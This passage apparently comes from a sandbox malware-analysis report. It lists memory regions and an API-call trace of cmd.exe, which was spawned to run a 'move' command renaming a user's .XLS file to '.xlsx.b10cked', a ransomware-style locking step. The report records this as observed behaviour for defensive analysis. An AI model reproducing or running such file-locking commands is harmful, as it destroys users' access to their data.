"pagefile_0x000000007f6f0000" filename = "" Region: id = 11898 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 11899 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11900 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 161 os_tid = 0x9b8 Process: id = "105" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16880" os_pid = "0xa54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11933 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11934 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11935 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11936 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 11937 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11938 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11939 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11940 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11941 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 11942 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12295 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12296 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12297 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 12298 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12299 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 12300 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12301 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12302 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12303 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12304 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12305 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12306 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12307 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12308 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12309 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 12310 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12311 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12312 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 12313 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 12314 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 12315 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 12316 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 12317 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 12318 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 164 os_tid = 0x9b4 [0132.076] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1aff64 | out: lpSystemTimeAsFileTime=0x1aff64*(dwLowDateTime=0x88a76f00, dwHighDateTime=0x1d440a9)) [0132.076] GetCurrentProcessId () returned 0xa54 [0132.076] GetCurrentThreadId () returned 0x9b4 [0132.076] GetTickCount () returned 0x2a0d0 [0132.076] QueryPerformanceCounter (in: lpPerformanceCount=0x1aff5c | out: lpPerformanceCount=0x1aff5c*=18886550141) returned 1 [0132.077] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0132.077] __set_app_type (_Type=0x1) [0132.077] __p__fmode () returned 0x76b331f4 [0132.077] __p__commode () returned 0x76b331fc [0132.077] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0132.077] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0132.077] GetCurrentThreadId () returned 0x9b4 [0132.077] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9b4) returned 0x38 [0132.077] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0132.077] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0132.077] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.078] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.078] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afef4 | out: phkResult=0x1afef4*=0x0) returned 0x2 [0132.078] VirtualQuery (in: lpAddress=0x1aff2b, lpBuffer=0x1afec4, dwLength=0x1c | out: lpBuffer=0x1afec4*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.078] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afec4, dwLength=0x1c | out: lpBuffer=0x1afec4*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0132.078] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afec4, dwLength=0x1c | out: lpBuffer=0x1afec4*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0132.078] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afec4, dwLength=0x1c | out: lpBuffer=0x1afec4*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.078] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afec4, dwLength=0x1c | out: lpBuffer=0x1afec4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0132.078] GetConsoleOutputCP () returned 0x1b5 [0132.078] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.078] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0132.078] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.078] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0132.078] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.078] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.078] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.078] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.079] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.079] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.079] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.079] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0132.079] GetEnvironmentStringsW () returned 0x270150* [0132.079] FreeEnvironmentStringsW (penv=0x270150) returned 1 [0132.079] GetEnvironmentStringsW () returned 0x270150* [0132.079] FreeEnvironmentStringsW (penv=0x270150) returned 1 [0132.079] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aee64 | out: phkResult=0x1aee64*=0x40) returned 0x0 [0132.079] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x0, lpData=0x1aee70*=0x78, lpcbData=0x1aee68*=0x1000) returned 0x2 [0132.079] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x4, lpData=0x1aee70*=0x1, lpcbData=0x1aee68*=0x4) returned 0x0 [0132.079] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x0, lpData=0x1aee70*=0x1, lpcbData=0x1aee68*=0x1000) returned 0x2 [0132.079] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x4, lpData=0x1aee70*=0x0, lpcbData=0x1aee68*=0x4) returned 0x0 [0132.079] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x4, lpData=0x1aee70*=0x40, lpcbData=0x1aee68*=0x4) returned 0x0 [0132.079] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x4, lpData=0x1aee70*=0x40, lpcbData=0x1aee68*=0x4) returned 0x0 [0132.080] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x0, lpData=0x1aee70*=0x40, lpcbData=0x1aee68*=0x1000) returned 0x2 [0132.080] RegCloseKey (hKey=0x40) returned 0x0 [0132.080] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aee64 | out: phkResult=0x1aee64*=0x40) returned 0x0 [0132.080] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x0, lpData=0x1aee70*=0x40, lpcbData=0x1aee68*=0x1000) returned 0x2 [0132.080] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x4, lpData=0x1aee70*=0x1, lpcbData=0x1aee68*=0x4) returned 0x0 [0132.080] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x0, lpData=0x1aee70*=0x1, lpcbData=0x1aee68*=0x1000) returned 0x2 [0132.080] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x4, lpData=0x1aee70*=0x0, lpcbData=0x1aee68*=0x4) returned 0x0 [0132.080] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x4, lpData=0x1aee70*=0x9, lpcbData=0x1aee68*=0x4) returned 0x0 [0132.080] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x4, lpData=0x1aee70*=0x9, lpcbData=0x1aee68*=0x4) returned 0x0 [0132.080] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x0, lpData=0x1aee70*=0x9, lpcbData=0x1aee68*=0x1000) returned 0x2 [0132.080] RegCloseKey (hKey=0x40) returned 0x0 [0132.080] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886366 [0132.080] srand (_Seed=0x5b886366) [0132.080] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked\"" [0132.080] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked\"" [0132.080] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.080] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2718b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0132.081] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.081] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.081] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.081] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0132.081] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0132.081] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0132.081] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0132.081] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0132.081] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0132.081] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0132.081] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0132.081] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0132.081] GetEnvironmentStringsW () returned 0x2722a0* [0132.081] FreeEnvironmentStringsW (penv=0x2722a0) returned 1 [0132.081] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.081] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.081] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0132.081] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0132.081] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0132.082] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0132.082] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0132.082] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0132.082] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0132.082] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0132.082] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1afc30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.082] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1afc30, lpFilePart=0x1afc2c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1afc2c*="Desktop") returned 0x18 [0132.082] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0132.082] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af9ac | out: lpFindFileData=0x1af9ac) returned 0x26ffe0 [0132.082] FindClose (in: hFindFile=0x26ffe0 | out: hFindFile=0x26ffe0) returned 1 [0132.082] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af9ac | out: lpFindFileData=0x1af9ac) returned 0x26ffe0 [0132.082] FindClose (in: hFindFile=0x26ffe0 | out: hFindFile=0x26ffe0) returned 1 [0132.082] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af9ac | out: lpFindFileData=0x1af9ac) returned 0x26ffe0 [0132.083] FindClose (in: hFindFile=0x26ffe0 | out: hFindFile=0x26ffe0) returned 1 [0132.083] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0132.083] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0132.083] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0132.083] GetEnvironmentStringsW () returned 0x272ac0* [0132.083] FreeEnvironmentStringsW (penv=0x272ac0) returned 1 [0132.083] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.083] GetConsoleOutputCP () returned 0x1b5 [0132.083] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.083] GetUserDefaultLCID () returned 0x409 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1afd70, cchData=128 | out: lpLCData="0") returned 2 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1afd70, cchData=128 | out: lpLCData="0") returned 2 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1afd70, cchData=128 | out: lpLCData="1") returned 2 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0132.084] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0132.085] GetConsoleTitleW (in: lpConsoleTitle=0x2608c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.085] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0132.085] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0132.085] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0132.085] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0132.086] _wcsicmp (_String1="move", _String2=")") returned 68 [0132.086] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0132.086] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0132.086] _wcsicmp (_String1="IF", _String2="move") returned -4 [0132.086] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0132.086] _wcsicmp (_String1="REM", _String2="move") returned 5 [0132.086] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0132.088] GetConsoleTitleW (in: lpConsoleTitle=0x1afa68, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.088] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0132.088] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0132.088] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0132.088] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0132.088] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0132.088] _wcsicmp (_String1="move", _String2="CD") returned 10 [0132.088] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0132.089] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0132.089] _wcsicmp (_String1="move", _String2="REN") returned -5 [0132.089] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0132.089] _wcsicmp (_String1="move", _String2="SET") returned -6 [0132.089] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0132.089] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0132.089] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0132.089] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0132.089] _wcsicmp (_String1="move", _String2="MD") returned 11 [0132.089] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0132.089] _wcsicmp (_String1="move", _String2="RD") returned -5 [0132.089] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0132.089] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0132.089] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0132.089] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0132.089] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0132.089] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0132.089] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0132.089] _wcsicmp (_String1="move", _String2="VER") returned -9 [0132.089] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0132.089] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0132.089] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0132.089] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0132.089] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0132.089] _wcsicmp (_String1="move", _String2="START") returned -6 [0132.089] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0132.089] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0132.089] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0132.090] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.090] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.090] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af824, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af81c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 